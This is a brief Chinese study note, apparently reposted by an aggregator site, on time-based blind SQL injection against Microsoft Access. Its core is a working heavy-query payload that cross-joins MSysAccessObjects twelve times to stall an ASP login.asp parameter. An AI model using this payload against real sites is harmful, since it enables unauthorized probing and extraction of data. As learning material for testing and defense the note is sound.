学习笔记 ACCESS 延迟注入

Posted 2020-08-22 烤红薯咖啡馆

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了学习笔记 ACCESS 延迟注入相关的知识，希望对你有一定的参考价值。

通过执行很多命令延长执行时间判断返回是否有SQL注入。

例如：

login.asp?id=1 and (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, 
MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and select count(*) from sys_admin

payload:

and (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, 
MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0

以上是关于学习笔记 ACCESS 延迟注入的主要内容，如果未能解决你的问题，请参考以下文章

SQL注入速查笔记

HIbernate学习笔记4 之延迟加载和关联映射

sql注入--access

sql注入笔记：基于时间延迟的盲注

学习笔记：python3，代码片段（2017）

Kotlin 延迟初始化和密封类[第一行代码 Kotlin 学习笔记]